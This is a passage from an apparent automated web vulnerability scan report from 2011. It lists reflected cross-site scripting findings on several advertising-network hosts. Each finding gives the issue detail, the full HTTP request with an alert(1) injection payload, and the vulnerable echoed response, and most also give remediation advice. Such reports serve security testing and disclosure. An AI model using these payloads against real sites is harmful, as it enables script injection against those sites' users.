HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c'$0:collective728x90;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:951,2,0:0,2,14:951,0,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=77:76:10:10:10:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=23
Expires: Sat, 17 Sep 2011 01:50:08 GMT
Date: Sat, 17 Sep 2011 01:49:45 GMT
Content-Length: 2750
Connection: close
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var z11=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='c82c2';alert(1)//7d572232822,284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=c82c2';alert(1)//7d572232822,284b8'-alert(1)-'0
...[SNIP]...
|
4.105. http://event.adxpose.com/event.flow [uid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://event.adxpose.com |
| Path: |
/event.flow |
Issue detail
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 569f5<script>alert(1)</script>cbb22875fc7 was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2F3ps.go.com%2FDynamicAd%3Fsrvc%3Dabc%26adTypes%3DRectangles-Remnant%26url%3D%2Fshows%2Fcharlies-angels&uid=TVYMYp4lQTRs9JsS_40691310569f5<script>alert(1)</script>cbb22875fc7&xy=0%2C0&wh=300%2C250&vchannel=41471866&cid=3941858&iad=1316239136911-64316275808960200&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/80181/197812/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=214EE77DC665E937F45E21D15B56E7C0; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 147
Date: Sat, 17 Sep 2011 01:03:37 GMT
Connection: close
if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("TVYMYp4lQTRs9JsS_40691310569f5<script>alert(1)</script>cbb22875fc7"); |
4.106. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://fw.adsafeprotected.com |
| Path: |
/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da1f4"-alert(1)-"f4229a086fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dcda1f4"-alert(1)-"f4229a086fa/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7A00B96A0D964F453E5BD8D5810F10FB; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:59 GMT
Connection: close
<html>
<head></head>
<body>
<script type="text/javascript"><!--
var adsafeVisParams = {
mode : "jsi",
jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
adsafeSrc : "http://fw.adsafeprotected.com/rfw/dcda1f4"-alert(1)-"f4229a086fa/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955",
adsafeSep : "?",
requrl : "",
reqquery : "",
debug : "false",
allowPho
...[SNIP]...
|
4.107. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 3]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://fw.adsafeprotected.com |
| Path: |
/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2023a"-alert(1)-"ff30b4aa7a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/103392023a"-alert(1)-"ff30b4aa7a4/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A971275997FA7630761B5092947B1A05; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:08:00 GMT
Connection: close
<html>
<head></head>
<body>
<script type="text/javascript"><!--
var adsafeVisParams = {
mode : "jsi",
jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/103392023a"-alert(1)-"ff30b4aa7a4/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955",
adsafeSep : "?",
requrl : "",
reqquery : "",
debug : "false",
allowPhoneHome
...[SNIP]...
|
4.108. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 4]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://fw.adsafeprotected.com |
| Path: |
/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 |
Issue detail
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db706"-alert(1)-"9cd6414e8aa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10339/128628db706"-alert(1)-"9cd6414e8aa/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A049BAB0531C29E6EC384F93AA842C69; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:08:00 GMT
Connection: close
<html>
<head></head>
<body>
<script type="text/javascript"><!--
var adsafeVisParams = {
mode : "jsi",
jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628db706"-alert(1)-"9cd6414e8aa/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955",
adsafeSep : "?",
requrl : "",
reqquery : "",
debug : "false",
allowPhoneHome : "fal
...[SNIP]...
|
4.109. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 5]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://fw.adsafeprotected.com |
| Path: |
/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 |
Issue detail
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 114c3"-alert(1)-"fc47482de42 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10339/128628/adi114c3"-alert(1)-"fc47482de42/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1DB5C21D80F320C04F41B642CF20125A; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:08:01 GMT
Connection: close
<html>
<head></head>
<body>
<script type="text/javascript"><!--
var adsafeVisParams = {
mode : "jsi",
jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628/adi114c3"-alert(1)-"fc47482de42/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955",
adsafeSep : "?",
requrl : "",
reqquery : "",
debug : "false",
allowPhoneHome : "false",
...[SNIP]...
|
4.110. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://fw.adsafeprotected.com |
| Path: |
/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 |
Issue detail
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b6a7"-alert(1)-"c3bd8bd988d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA6b6a7"-alert(1)-"c3bd8bd988d/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1DCCDAFA24DD21FDF6463237374426AC; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:08:02 GMT
Connection: close
<html>
<head></head>
<body>
<script type="text/javascript"><!--
var adsafeVisParams = {
mode : "jsi",
jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628/adi/N4682.126265.CASALEMEDIA6b6a7"-alert(1)-"c3bd8bd988d/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955",
adsafeSep : "?",
requrl : "",
reqquery : "",
debug : "false",
allowPhoneHome : "false",
phoneHomeDelay : "3000"
...[SNIP]...
|
4.111. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 7]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://fw.adsafeprotected.com |
| Path: |
/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 |
Issue detail
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 640d2"-alert(1)-"0338569564a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9640d2"-alert(1)-"0338569564a;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6B61580EFD1DC69FFF19E25E19111CA1; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:08:01 GMT
Connection: close
<html>
<head></head>
<body>
<script type="text/javascript"><!--
var adsafeVisParams = {
mode : "jsi",
jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9640d2"-alert(1)-"0338569564a;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955",
adsafeSep : "?",
requrl : "",
reqquery : "",
debug : "false",
allowPhoneHome : "false",
phoneHomeDelay : "3000",
killPhra
...[SNIP]...
|
4.112. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://fw.adsafeprotected.com |
| Path: |
/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77df7"-alert(1)-"55e8aaf402d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955&77df7"-alert(1)-"55e8aaf402d=1 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=81D38C248A8FC0D3AE4AEA54D3D89A0E; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:58 GMT
Connection: close
<html>
<head></head>
<body>
<script type="text/javascript"><!--
var adsafeVisParams = {
mode : "jsi",
jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955&77df7"-alert(1)-"55e8aaf402d=1",
adsafeSep : "?",
requrl : "",
reqquery : "",
debug : "false",
allowPhoneHome : "false",
phoneHomeDelay : "3000",
killPhrases : "",
asid : "gt69exsw"
};
(function(){var O="3.13.1";var w=(
...[SNIP]...
|
4.113. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [sz parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://fw.adsafeprotected.com |
| Path: |
/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 |
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6da0d"-alert(1)-"9d189a7cf3d was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=34856309556da0d"-alert(1)-"9d189a7cf3d HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=85A39D4B6E9886329A268FD24420D20D; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:58 GMT
Connection: close
<html>
<head></head>
<body>
<script type="text/javascript"><!--
var adsafeVisParams = {
mode : "jsi",
jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=34856309556da0d"-alert(1)-"9d189a7cf3d",
adsafeSep : "?",
requrl : "",
reqquery : "",
debug : "false",
allowPhoneHome : "false",
phoneHomeDelay : "3000",
killPhrases : "",
asid : "gt69exl9"
};
(function(){var O="3.13.1";var w=(ad
...[SNIP]...
|
4.114. http://g2.gumgum.com/services/get [callback parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://g2.gumgum.com |
| Path: |
/services/get |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 64628<script>alert(1)</script>adbac286e48 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/get?callback=GUMGUM.startServices64628<script>alert(1)</script>adbac286e48&_=1316238826949&pubdata={%22t%22:%22tmzdtcom%22,%22v%22:1,%22r%22:%229926v3%22,%22rf%22:%22%22} HTTP/1.1
Host: g2.gumgum.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Content-Type: text/javascript;charset=UTF-8
Date: Sat, 17 Sep 2011 00:53:48 GMT
Server: nginx/0.6.35
Set-Cookie: ggtests=t3%3D44%26t2%3D23%26t1%3D49%26t10%3D48%26t11%3D50%26t4%3D7%26t6%3D43%26t7%3D45%26t9%3D47; Domain=.gumgum.com; Path=/
Content-Length: 304
Connection: keep-alive
GUMGUM.startServices64628<script>alert(1)</script>adbac286e48({"at":{"mh":200,"sf":true,"mw":200,"ps":true},"pxs":{"across33":true,"qsg":"Entertainment.tmzdtcom","media6":true,"qac":"p-00TsOkvHvnsZU","file":"pixels","priority":9,"quantcast":true},"pag":{"pvid":"
...[SNIP]...
|
4.115. http://ib.adnxs.com/ptj [redir parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ib.adnxs.com |
| Path: |
/ptj |
Issue detail
The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a19be'%3balert(1)//63b277fa96a was submitted in the redir parameter. This input was echoed as a19be';alert(1)//63b277fa96a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ptj?member=514&size=300x250&referrer=http://www.tmz.com/&inv_code=2298003&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D2298003%26r%3D1%26_salt%3D1775927586%26u%3Dhttp%253A%252F%252Fwww.tmz.com%252F%26u%3Dhttp%3A%2F%2Fwww.tmz.com%2Fa19be'%3balert(1)//63b277fa96a HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; sess=1; uuid2=-1
|
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 00:54:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-17; path=/; expires=Fri, 16-Dec-2011 00:54:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb549359=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb201818=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII2IgDEAoYUSBRKFEwzN_P8wQQzN_P8wQYUA..; path=/; expires=Fri, 16-Dec-2011 00:54:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb884=![nC'208WMcbJO=)IE.8$p5s4?enc=AAAAAAAA0D8zMzMzMzPLPwAAAAAAABRAMzMzMzMzyz8AAAAAAADQP8hj40ddzOJZ7__________L73NOAAAAAP7HBwACAgAAHgAAAAMAAACpIQUAiwMBAAEAAABVU0QAVVNEACwB-gAKJwAAzxEBAgUCAQUAAAAAdx2drAAAAAA.&tt_code=2298003&click=http://g.ca.bid.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtjDEOwDAIA78SMXcADI7SN0XdOlX9e0HqdD7Z8Agg5zBNRB5D4GU0WrLMSoQxuYhlae5QrAjpZXczXWdbn3kxf0bxuveuyP5PV8P7AXsaFSU-%26redirectURL=&pixel=http://g.ca.bid.invitemedia.com/adnxs_imp%3FreturnType=image%26key=AdImp%26cost=$%7BPRICE_PAID%7D%26ex_uid=2_-17%26creativeID=112554%26message=eJwtjDEOwDAIA78SMXcADI7SN0XdOlX9e0HqdD7Z8Agg5zBNRB5D4GU0WrLMSoQxuYhlae5QrAjpZXczXWdbn3kxf0bxuveuyP5PV8P7AXsaFSU-%26managed=false&media_subtypes=1; path=/; expires=Sun, 18-Sep-2011 00:54:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3Z#yJ16m@n8l)=m!zsC8%0Q!816usE!>w6Lc1t!<6-c4nLmV#(f3[iRHV@?K@i[?NGU:QTKx<k4Ji.4N$kk1OJY^A'Bdr9u)1l85nIwbM6sex^qF_k7^/suduT>zr!%>zw81Y'8Y7?BMSJYDNCC'Y#an; path=/; expires=Fri, 16-Dec-2011 00:54:36 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 00:54:36 GMT
Content-Length: 246
